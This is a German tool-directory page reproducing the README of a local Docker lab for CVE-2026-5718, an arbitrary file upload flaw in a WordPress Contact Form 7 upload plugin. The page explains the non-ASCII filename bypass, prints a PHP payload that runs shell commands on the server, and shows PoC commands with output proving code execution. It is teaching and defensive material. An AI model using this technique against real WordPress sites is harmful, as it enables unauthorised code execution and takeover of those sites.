Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5718-Lab — # Lokales Docker-Labor zur Demonstration von CVE-2026-5718 – beliebigem Datei-Upload in einem WordPress-Plugin, mit verwundbaren und gepatchten Diensten für die parallele Analyse von Ausnutzung und Abwehr. | Kitploit
Tools/GitHubGitHub/rootdirective-sec/cve-2026-5718-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFLernen & BildungLabs & Praxis
GitHubrootdirective-sec/cve-2026-5718-lab

CVE-2026-5718-Lab

# Lokales Docker-Labor zur Demonstration von CVE-2026-5718 – beliebigem Datei-Upload in einem WordPress-Plugin, mit verwundbaren und gepatchten Diensten für die parallele Analyse von Ausnutzung und Abwehr.

Repository anzeigen
141vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-5718 Lokales Docker-Labor

Nur-lokales Docker-Labor mit verwundbarer und gepatchter Umgebung für CVE-2026-5718, das das WordPress-Plugin Drag and Drop Multiple File Upload for Contact Form 7 betrifft.

Dieses Labor demonstriert den Unterschied zwischen der verwundbaren Version 1.3.9.6 und der gepatchten Version 1.3.9.7 mithilfe eines PHP-Ausführungsnachweises mit minimalem Schadenspotenzial in einer reinen Docker-Umgebung.

Geltungsbereich: nur localhost / Docker-Netzwerk. Verwenden Sie diesen PoC nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben.


Zusammenfassung

CVE-2026-5718 ist eine Schwachstelle für beliebigen Datei-Upload in Drag and Drop Multiple File Upload for Contact Form 7 bis einschließlich Version 1.3.9.6.

Das Problem wird ausgelöst, wenn benutzerdefinierte Blacklist-Typen konfiguriert sind und ein Dateiname Nicht-ASCII-Zeichen enthält. In der verwundbaren Version kann ein gefährlicher .php-Upload den vorgesehenen Schutz umgehen und ausführbar bleiben. Version 1.3.9.7 behebt das Problem, indem derselbe Upload abgelehnt wird.

Dieses Repository enthält zwei lokale WordPress-Dienste:

  • vuln auf http://localhost:8081 mit Plugin-Version 1.3.9.6
  • patched auf http://localhost:8082 mit Plugin-Version 1.3.9.7

Architektur des Labors

Host
├── http://localhost:8081  -> vulnerable WordPress service
└── http://localhost:8082  -> patched WordPress service

Docker network
├── vuln
├── vuln-db
├── patched
└── patched-db
DienstZweckHost-PortVersion
vulnVerwundbares WordPress-Labor8081Plugin 1.3.9.6
patchedGepatchtes WordPress-Labor8082Plugin 1.3.9.7
vuln-dbMySQL-Datenbank für den verwundbaren DienstinternMySQL 8.0
patched-dbMySQL-Datenbank für den gepatchten DienstinternMySQL 8.0

Repository-Struktur

.
├── docker-compose.yml
├── patched
│   └── Dockerfile
├── poc
│   └── poc.py
│   └── requirements.txt
├── scripts
│   └── seed-wordpress.sh
├── vuln
│   └── Dockerfile

Schwachstellenablauf

Das eingerichtete Contact-Form-7-Formular enthält ein Drag and Drop Multiple File Upload-Feld:

[mfile upload-file filetypes:* blacklist-types:zip limit:1048576]

Der PoC lädt eine PHP-Nachweisdatei mit folgendem Namen hoch:

proof-β.php

Das Zeichen β ist kein ASCII-Zeichen. Das ist wichtig, weil die Schwachstelle von der Dateinamenverarbeitung bei Nicht-ASCII-Eingaben abhängt.

Überblick über den Ablauf:

PoC
 ↓
Fetch lab page and extract DnD CF7 AJAX nonce
 ↓
Upload proof-β.php through wp-admin/admin-ajax.php
 ↓
Vulnerable 1.3.9.6 accepts and stores the file as .php
 ↓
PoC requests the uploaded file
 ↓
Vulnerable lab executes the PHP proof as www-data

Ablauf mit Patch:

PoC
 ↓
Upload the same proof-β.php file
 ↓
Patched 1.3.9.7 rejects the upload
 ↓
No PHP file is stored and no code execution occurs

Aufbau des lokalen RCE-Nachweises

Der hochgeladene PHP-Nachweis ist bewusst minimal gehalten:

<?php
header('Content-Type: text/plain');
echo "CVE_2026_5718_LOCAL_RCE_PROOF\n";
echo "whoami=" . trim(shell_exec('whoami')) . "\n";
echo "id=" . trim(shell_exec('id')) . "\n";
?>

Der Nachweis führt nur whoami und id aus, um den Ausführungskontext zu zeigen. Er verwendet keine Reverse Shell, keine Persistenz, keinen Zugriff auf Anmeldedaten, keine laterale Bewegung, kein Netzwerk-Scanning und keine destruktiven Aktionen.

Der verwundbare Dienst erlaubt absichtlich die PHP-Ausführung im Upload-Verzeichnis des Plugins, damit die Auswirkung in diesem lokalen Labor beobachtbar ist. Der gepatchte Dienst behält das sicherere Verhalten bei und lehnt den Upload bereits in der Anwendungsvalidierungsschicht ab.


Voraussetzungen

  • Docker Desktop
  • Docker Compose v2
  • Python 3

Python-Abhängigkeiten installieren:

python3 -m venv .venv
source .venv/bin/activate
pip install -r poc/requirements.txt

Build und Ausführung

Von einem sauberen Zustand aus starten:

docker compose down -v
docker compose up --build -d

Dienststatus prüfen:

docker compose ps

Die Laborseiten öffnen:

http://localhost:8081/cve-2026-5718-lab/
http://localhost:8082/cve-2026-5718-lab/

PoC ausführen

Gegen den verwundbaren Dienst ausführen:

python poc/poc.py --base-url http://localhost:8081

Gegen den gepatchten Dienst ausführen:

python poc/poc.py --base-url http://localhost:8082

Der PoC akzeptiert nur localhost- oder Loopback-Ziele.


Erwartetes Ergebnis

Verwundbarer Dienst

Erwartetes Verhalten:

  • Der Upload wird akzeptiert.
  • Der hochgeladene Dateiname bleibt eine .php-Datei.
  • Der hochgeladene PHP-Nachweis wird als Webserver-Benutzer ausgeführt.

Beispielausgabe:

Upload response:
{"success":true,"data":{"path":"cve5718proof","file":"proof-\u03b2.php"}}

Proof response:
CVE_2026_5718_LOCAL_RCE_PROOF
whoami=www-data
id=uid=33(www-data) gid=33(www-data) groups=33(www-data)

[result] VULNERABLE behavior observed: uploaded PHP proof executed.

Gepatchter Dienst

Erwartetes Verhalten:

  • Derselbe Upload wird abgelehnt.
  • Der PHP-Nachweis wird nicht als ausführbare Datei gespeichert.
  • Es findet keine Codeausführung statt.

Beispielausgabe:

Upload response:
{"success":false,"data":"Uploaded file is not allowed for file type"}

[result] Upload rejected by the application.
[result] Reason: Uploaded file is not allowed for file type

Sicherheitshinweise

Dieses Labor ist bewusst auf lokale Tests beschränkt.

Der PoC:

  • blockiert Nicht-Localhost-Ziele,
  • verwendet keine Reverse Shell,
  • führt keine Persistenz durch,
  • liest keine Geheimnisse,
  • scannt keine Netzwerke,
  • führt im verwundbaren Container nur whoami und id aus.

Der verwundbare Dienst lockert die PHP-Ausführung im Upload-Verzeichnis nur, um den lokalen Nachweis beobachtbar zu machen. Übernehmen Sie diese Konfiguration nicht in die Produktion.


Bereinigung

Container stoppen:

docker compose down

Container und Volumes entfernen:

docker compose down -v

Die Python-Virtual-Environment entfernen:

rm -rf .venv

Referenzen

  • NVD: CVE-2026-5718 https://nvd.nist.gov/vuln/detail/CVE-2026-5718

  • Patchstack-Sicherheitshinweis: WordPress Drag and Drop Multiple File Upload for Contact Form 7 Plugin <= 1.3.9.6 - Nicht authentifizierter beliebiger Datei-Upload über Nicht-ASCII-Dateinamen-Blacklist-Bypass https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability

Tool herunterladen